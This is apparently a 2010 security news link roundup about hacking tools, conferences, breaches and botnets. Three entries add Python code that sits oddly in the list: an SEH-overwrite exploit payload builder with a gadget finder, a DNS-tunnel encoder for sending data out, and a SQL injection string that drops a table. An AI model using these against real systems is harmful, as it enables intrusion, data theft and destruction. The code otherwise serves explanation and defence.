- Belated RSA postings
Some last-minute RSA catch-ups.
- Ninja Networks Twitter – twitter.com
Follow @ninjanetworks on Twitter leading up to and during DEFCON for Ninja badge and event information.
- Hackers In Japan – hackerspaces.org
The idea is a group trip to Japan with hackers from all around the world.
- A few hacker challenges coming up
- smp Capture The Flag (CTF) 2010 Hacker Olympics – smpctf.com
- The Mid-Atlantic Regional CCDC 2010 Event – Part I – tenablesecurity.com
- The Mid-Atlantic Regional CCDC 2010 Event – Part II – tenablesecurity.com
- Internet Crime Complaint Center Annual Reports – ic3.gov
The annual statistics on Internet crime complaints, all in one neat report.
- Charlie Miller on Mac OS X, Pwn2Own and Writing Exploits – threatpost.com
An interview with the well-known hacker on his latest projects and future plans.
- Facebook @ OWASP – owasp.org
A section of the OWASP wiki dedicated to the most popular social network on the planet.
- Black Hat Webcast: Pen Testing the Web with Firefox – scribd.com
The slides from the recent presentation.
- The current state of the crimeware threat – Q&A – zdnet.com
One of the people behind the Waledac takedown summarizes 33GB of crimeware data.
- Verizon Incident Sharing Framework – taosecurity.blogspot.com
Richard Bejtlich sits on the advisory board for Verizon’s VerIS incident-sharing framework.
- Fimap v0.8A – code.google.com/p/fimap/
Fimap is a Python tool that automatically finds, prepares, audits and exploits LFI/RFI bugs in web apps, and can even search the web for them.
- Presenting the Meraki WiFi Stumbler… – meraki.com
The first browser-based wireless scanner lets you find networks (even hidden ones) from any system with a browser.
- sqlmap 0.8 – bernardodamele.blogspot.com
Bernardo Damele releases an update to his SQL injection tool.
- ZigBee: attack of the killer bees – h-online.com
Developer Joshua Wright intends to release KillerBee for testing the security of ZigBee networks.
- WhatWeb v0.4 – morningstarsecurity.com
A next-generation web scanner that fingerprints the technologies behind a site.
- OWASP JBroFuzz 2.0 Fuzzer Released! – owasp.blogspot.com
An update on the fuzzer from OWASP, featuring better fuzzing, keyboard shortcuts and more.
- Buck Security – buck-security.sourceforge.net
Buck Security is a collection of security checks for Linux.
- skipfish – code.google.com/p/skipfish/
A fully automated, active web application security reconnaissance tool, straight from Google.
- FireCAT v1.6.2 – firecat.fr
The auditing extension catalogue now features BackendInfo in its list.
- Digital Forensics Framework v0.5 – digital-forensic.org
DFF is a simple but powerful open source tool with a flexible module system that helps with digital forensics work.
- Jericho Forum Offers Free Security Product Assessment Tool – darkreading.com
Jericho Forum has created a free self-assessment tool for security vendors and buyers to determine the security of their products in cloud-based environments.
- XSSploit v0.5 – scrt.ch
Developed to help with the discovery and exploitation of XSS vulnerabilities during penetration tests.
- Cookie Monster – tomneaves.com
Cookie Monster will grab cookies from a host and assign each character a number.
- Looking for malware in all the wrong places? – itworld.com
Some thoughts on how malware scanning should evolve in the future.
- Effing with Foursquare
Goofing around with the popular location service, courtesy of carnal0wnage.
- QuickZip Stack BOF : A box of chocolates – part 2 – offensive-security.com
How to build a QuickZip exploit by overwriting the SEH handler with a POP POP RET address taken from an OS DLL.
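As an added illustration of the POP POP RET technique (not code from the offensive-security post), the snippet below does the two things you need in practice: scan a module image for `POP r32; POP r32; RET` byte sequences whose address contains no bad characters, and lay out the classic SEH overwrite payload around the address you pick. The module bytes, base address and offsets are constructed stand-ins, not QuickZip’s or any real DLL’s values.

```python
import struct

POP_R32 = frozenset(range(0x58, 0x60))   # one-byte POP EAX .. POP EDI


def find_pop_pop_ret(image: bytes, base: int, bad_chars: bytes = b"\x00") -> list:
    """Return virtual addresses of POP r32; POP r32; RET(N) gadgets in `image`
    (the raw bytes of a module mapped at `base`), skipping any address whose
    little-endian encoding contains a bad character."""
    hits = []
    for i in range(len(image) - 2):
        if (image[i] in POP_R32 and image[i + 1] in POP_R32
                and image[i + 2] in (0xC3, 0xC2)):          # RET or RET imm16
            va = base + i
            if not any(b in bad_chars for b in struct.pack("<I", va)):
                hits.append(va)
    return hits


def build_seh_payload(offset_to_nseh: int, ppr_va: int, shellcode: bytes) -> bytes:
    """Classic SEH overwrite layout:
        [junk][nSEH = short JMP +6][SEH = POP POP RET][NOP sled][shellcode]
    When the overflow triggers an exception, the dispatcher calls our handler
    (the POP POP RET); the two POPs discard two stack slots and RET lands on
    the pointer to the registration record, i.e. on nSEH, whose short jump
    skips over the SEH record into the sled."""
    nseh = b"\xeb\x06\x90\x90"               # JMP SHORT +6, padded to 4 bytes
    seh = struct.pack("<I", ppr_va)          # little-endian handler address
    return b"A" * offset_to_nseh + nseh + seh + b"\x90" * 16 + shellcode


# Constructed stand-in for an OS DLL image (INT3 filler); hypothetical base.
FAKE_BASE = 0x7C811000
_img = bytearray(b"\xcc" * 0x200)
_img[0x010:0x013] = b"\x5b\x5d\xc3"   # POP EBX; POP EBP; RET  -> 0x7C811010, usable
_img[0x100:0x103] = b"\x58\x5e\xc3"   # POP EAX; POP ESI; RET  -> 0x7C811100, has a NUL byte
FAKE_DLL = bytes(_img)


def demo() -> bytes:
    gadgets = find_pop_pop_ret(FAKE_DLL, FAKE_BASE)   # only the NUL-free one survives
    return build_seh_payload(offset_to_nseh=1024, ppr_va=gadgets[0], shellcode=b"\xcc" * 4)
```

Pick gadgets from a module without SafeSEH and without ASLR, and keep the short jump as the first thing at nSEH; if the application mangles the buffer (Unicode conversion, for example) the encoding of both the jump and the address has to be reworked.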
- Blazing fast password recovery with new ATI cards – net-security.org
Get some crazy cracking power by utilizing your GPU.
- Network Analysis, Logitech Mouse Server – digitalbond.com
A bored hacker takes aim at the server program of Logitech’s iPhone app.
- Fresh exploit served up with ads – avg.com
A politically motivated exploit built on the Liberty exploit kit appears in ad traffic.
- Inline vs. Out-of-Line WAF Deployments – tacticalwebappsec.blogspot.com
A response to an article about Web Application Firewall considerations.
- Auto-Scanning the Names People Choose For Their Wireless APs – slashdot.org
One wardriver gathered AP names on his commute for fun and… well, more fun.
- Archiving Windows System Files for Binary Diffing – l1pht.com
I present for your viewing pleasure… binaryeti.
- Technical Report: “Abusing Social Networks for Automated User Profiling” – honeyblog.org
The paper focuses on automatically collecting information about users from the data available across different networks.
- Top 25 series
The SANS Top 25 security flaws series continues for another week.
- Weaponizing dnscat with shellcode and Metasploit – skullsecurity.org
As long as the target can reach a DNS server that performs recursive lookups, the tunnel works great.
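The reason recursion is all you need: the payload travels as query names for a domain the attacker is authoritative for, so the victim’s configured resolver forwards it for you. The following is an added example of that encoding step, written for this page and not taken from dnscat; the domain name and label budget are assumptions. It chunks data into base32 labels (DNS is case-insensitive, so base64 would not survive a resolver), respects the 63-byte label and 253-byte name limits, and reassembles out-of-order queries by sequence number.

```python
import base64

MAX_LABEL = 63       # RFC 1035 label limit
MAX_NAME = 253       # practical limit for a full domain name
RAW_PER_LABEL = 35   # 35 bytes -> 56 base32 chars, no padding, under 63


def _b32(chunk: bytes) -> str:
    return base64.b32encode(chunk).decode("ascii").rstrip("=").lower()


def _unb32(label: str) -> bytes:
    s = label.upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def encode_queries(data: bytes, domain: str, labels_per_name: int = 3) -> list:
    """Split `data` into query names of the form <seq>.<b32>.<b32>.<b32>.<domain>.
    Each name is a lookup the victim sends to its resolver, which recurses to the
    attacker's authoritative server for `domain`."""
    per_name = RAW_PER_LABEL * labels_per_name
    names = []
    for seq, off in enumerate(range(0, len(data), per_name)):
        block = data[off:off + per_name]
        labels = [_b32(block[i:i + RAW_PER_LABEL])
                  for i in range(0, len(block), RAW_PER_LABEL)]
        name = ".".join(["%04x" % seq] + labels + [domain])
        if len(name) > MAX_NAME or any(len(l) > MAX_LABEL for l in name.split(".")):
            raise ValueError("name too long for domain %r" % domain)
        names.append(name)
    return names


def decode_queries(names: list, domain: str) -> bytes:
    """Reassemble the payload on the authoritative side. UDP queries can arrive
    out of order or duplicated, so index blocks by sequence number."""
    suffix = "." + domain
    blocks = {}
    for name in names:
        if not name.endswith(suffix):
            continue                      # unrelated query, ignore
        labels = name[:-len(suffix)].split(".")
        seq, data_labels = int(labels[0], 16), labels[1:]
        blocks[seq] = b"".join(_unb32(l) for l in data_labels)
    return b"".join(blocks[k] for k in sorted(blocks))
```

Detection-wise this is also why DNS tunnels stand out: long, high-entropy labels and a burst of unique subdomains under one zone are easy to flag on a resolver log.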
- Penetrating Intranets through Adobe Flex Applications – gdssecurity.com
In this post, I’ll show how you can exploit Flex applications that use BlazeDS to gain access to internal networks.
- The Latest Adobe Exploit and Session Upgrading – metasploit.com
An exploit against Adobe was ported to Metasploit with interesting results.
- Naming and Shaming ‘Bad’ ISPs – krebsonsecurity.com
Former Washington Post security reporter Brian Krebs analyzes and pinpoints ISPs with outstanding abuse issues.
- Skipfish, Google Enters the Web Scanner Fray – redspin.com
The new scanner from Google is tested and reviewed.
- Burp Suite Tutorial – Repeater and Comparer Tools – securityninja.co.uk
A few words on the Repeater and Comparer security tools inside the Burp Suite.
- Sniffing with Wireshark as a Non-Root User – packetlife.net
How to capture packets with Wireshark on a Linux box without running it as root.
- Hijacking Blackberry Internet Browsing – remote-exploit.org
You can actually force a BlackBerry to use a rogue access point for Internet browsing without any special user interaction.
- Exploit’s new technology trick dodges memory protection – h-online.com
jduck has found the first malicious PDF files in the wild that use return-oriented programming (ROP) to bypass DEP.
- Trouble Ticket Express Exploit in the Wild… – isc.sans.org
A day ago, a proof-of-concept exploit in Trouble Ticket Express help desk software was made public.
- Spamassassin Milter Plugin Remote Root Attack – isc.sans.org
It appears that the bad guys have started to actively exploit SpamAssassin’s milter vulnerability.
- Flaw in Virtual PC hits the fan
The vulnerability, which is unpatched, essentially allows an attacker to bypass several major security mitigations.
- Vulnerability in Virtual PC? – windowsteamblog.com
- Microsoft Virtual PC Flaw Lets Hackers Bypass Windows Defenses – threatpost.com
- Holes in Apple’s software to be showcased in CanSecWest
Charlie Miller ran a three-week fuzzing run to find vulnerabilities in applications from several vendors.
- Mozilla Acknowledges Critical Zero Day Flaw in Firefox – threatpost.com
A critical flaw that could result in remote code execution on vulnerable Firefox 3.6 builds.
- Stopgap IE Fix, Safari Update Available – krebsonsecurity.com
A couple of browser updates to keep your computer fit and healthy.
- Simple workarounds for latest IE security vulnerability – h-online.com
As posted above, Microsoft has released workarounds to ease your IE security woes.
- Airline buys competitor’s cheap seats so you can’t – gadling.com
Some anti-competitive tomfoolery with online booking, and a bit of hacking, by a Danish carrier.
- Humans continue to be ‘weak link’ in data security – computerworlduk.com
A UK study shows that data breach costs are rising, too bad we can’t just release a patch to fix “Hu-mans”.
- The Future of Botnets – threatpost.com
Malware-as-a-service is envisioned to take off in a different and scary way.
- Conversations With a Blackhat – ha.ckers.org
An insight to the mind of a person wearing the “other” type of hat.
- Iran hacks US spy sites, arrests 30 activists – computerworlduk.com
Iran’s Islamic Revolutionary Guards Corps hacked into 29 websites affiliated with US espionage networks.
- Reality star turns back on TV to fight cybercrime – sophos.com
Spencer Pratt quitting The Hills to battle the looming national cyberthreat? Or just another reality prank?
- Cyber crime losses in US almost ‘double’ during 2009 – bbc.co.uk
Losses due to online crime totalled $560m in 2009, up from $265m the previous year.
- Internet safety video could win you $10,000 – cnet.com
Trend Micro launched a contest where the person who submits the best short video can win a heap of cold, hard cash.
- Security Pros With Written Career Plans Make More Money – darkreading.com
Around 60 percent of those who have written career plans earn more than $100,000 a year.
- Waledac-based news from the front
- What we know (and learned) from the Waledac takedown – technet.com
- Waledac Botnet Now Completely Crippled, Experts Say – threatpost.com
- Latest Intel processor security features – erratasec.blogspot.com
The updated “Westmere” processors are boosted with new security features.
- New Trick to View Hidden Facebook Photos and Tabs – theharmonyguy.com
A neat trick to peek at hidden stuff from your friends.
- Undercover Feds on Social Networking Sites Raise Questions – wired.com
Law enforcement agents are using Facebook and MySpace as investigative tools to root out crooks.
- Academic Paper in China Sets Off Alarms in U.S. – nytimes.com
A Chinese researcher’s paper modelling a cascading-failure attack on the US power grid sets off alarms in Washington.
- SQL Injection License Plate Hopes to Foil Euro Traffic Cameras – gizmodo.com
This should teach them to use parameterised queries instead of trusting whatever the camera reads.
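For anyone who wants to see the joke land, here is an added example (not from the gizmodo story, and the plate text is made up for illustration) of a plate-logging routine built by string concatenation next to the parameterised version, run against an in-memory SQLite database. SQLite’s `execute()` refuses stacked statements, which is why the vulnerable version uses `executescript()`; with most other database drivers the stacked `DROP TABLE` would run through the ordinary query call.

```python
import sqlite3

# Constructed plate string for illustration; not the plate from the article.
MALICIOUS_PLATE = "ZU 0666', 0); DROP TABLE plates; --"


def _fresh_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE plates (id INTEGER PRIMARY KEY, plate TEXT, speed INTEGER)")
    return db


def log_plate_vulnerable(db: sqlite3.Connection, plate: str, speed: int) -> None:
    # The OCR'd plate is pasted straight into the SQL text. The attacker's quote
    # closes the string, the ')' closes VALUES, and the rest is a second statement.
    sql = "INSERT INTO plates (plate, speed) VALUES ('%s', %d);" % (plate, speed)
    db.executescript(sql)          # runs every statement in the string


def log_plate_safe(db: sqlite3.Connection, plate: str, speed: int) -> None:
    # Placeholders: the plate is bound as data and can never become SQL syntax.
    db.execute("INSERT INTO plates (plate, speed) VALUES (?, ?)", (plate, speed))
    db.commit()


def table_exists(db: sqlite3.Connection) -> bool:
    row = db.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name='plates'"
    ).fetchone()
    return row is not None


def demo_vulnerable() -> bool:
    """Returns whether the plates table survived the vulnerable insert."""
    db = _fresh_db()
    log_plate_vulnerable(db, MALICIOUS_PLATE, 140)
    return table_exists(db)        # False: the table is gone


def demo_safe() -> str:
    """Returns what the parameterised insert actually stored."""
    db = _fresh_db()
    log_plate_safe(db, MALICIOUS_PLATE, 140)
    return db.execute("SELECT plate FROM plates").fetchone()[0]   # the literal string
```

Escaping quotes by hand is not a substitute: the fix is binding parameters, so the database never parses user data as part of the statement.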
- Researchers Map Multi-Network Cybercrime Infrastructure – krebsonsecurity.com
The Troyak network, an upstream provider for a large share of Zeus botnet controllers, is mapped and cut off.
- Change in Focus – securityfocus.com
Symantec-owned SecurityFocus stops producing its own news coverage, and the future of the site is pondered.
- a $16 pocket spectrum analyzer – ossmann.blogspot.com
Michael Ossmann turns a pre-teen messaging toy into a spectrum analyzer.
- The tricks in the book – news on the latest cons, scams and dupes on the Web
- Beware census scam artist tricks – cnn.com
- FBI details most difficult Internet scams – networkworld.com
- Top Cybercrimes Of The Year – inc.com
- Law firms are lucrative targets of cyberscams – sfgate.com
- Casinos conned by IT hackers who printed false betting slips – telegraph.co.uk
- We’re Not Talking Peanuts Here, Folks – eset.com
- Stock fixing Russian company investigated
A company allegedly fixing trades in the stock market faces stiff penalties for their misdeeds.
- Top 10 Vulnerability Researchers 2009 – zoller.lu
Data from IBM ISS on the researchers who discovered and published the most vulnerabilities in 2009.
- Hacker Disables More Than 100 Cars Remotely – wired.com
A disgruntled ex-employee of an auto dealer remotely disables cars sold by the company that sacked him.
- PSC sought change – wdam.com
Telemarketers beware, spoofing your caller ID can lead to criminal charges.
- Cybercrime’s bulletproof hosting exposed – theregister.co.uk
Researchers have identified the network framework that endows notorious botnets with always-on connections.
- Revised cybersecurity bill introduced in Senate – computerworld.com
It seeks to improve national cybersecurity preparedness by fostering closer collaboration between the government and the private sector.
- Pwn2Own Predictions: Apple iPhone Will Fall – threatpost.com
Infosec experts predict which devices will get rooted in this year’s CanSecWest hacking contest.
- FTC to Internet Companies: Start Using SSL – eff.org
Outgoing FTC Commissioner Pamela Jones Harbour called on Web services like Facebook and Hotmail to start using HTTPS/SSL encryption.
- 1st Trial Under California Spam Law Slams Spammer – slashdot.org
People who receive false and deceptive spam emails are entitled to damages of $1,000 per email under California Law
- Fired CISO says his comments never put Penn.’s data at risk – computerworld.com
Maley admits he was wrong to speak at RSA, won’t appeal firing.
- Unprecedented 25-Year Sentence Sought for TJX Hacker – wired.com
Gonzalez, who was charged with bank-card theft, is facing at least 17 years in prison.
- Dismantling of Saudi-CIA Web site illustrates need for clearer cyberwar policies – washingtonpost.com
A jihadist website run jointly by Saudi intelligence and the CIA to monitor extremists was dismantled by the US military because it was being used to plan attacks.
- Malware infected memory cards of 3,000 Vodafone mobiles – itworld.com
The company is now investigating how the malware programs ended up on the phones.
- PNC: Former National City Bank Accounts Hacked – liquidmatrix.org
Due diligence didn’t reveal that a credit card data breach affected PNC’s latest bank acquisition.
- Latest Version Of Cybersecurity Act Lessens Presidential Power – darkreading.com
Chief exec no longer has unilateral power to disconnect networks from the Internet in the event of a major cyberattack.
- End Users Buck Security Advice For Economic Reasons – darkreading.com
Without proof that strong passwords and Website certificates actually keep them safe, it’s no wonder end users ignore security advice, says a Microsoft Research expert, among others.
- Massive FBI computer overhaul is put on ice (again) – theregister.co.uk
Putting the project known as Sentinel on hold has alarmed some on Capitol Hill.
- IRS security faults leave taxpayer information at risk – networkworld.com
A whopping 69% of the tax agency’s previously noted security flaws remain unfixed.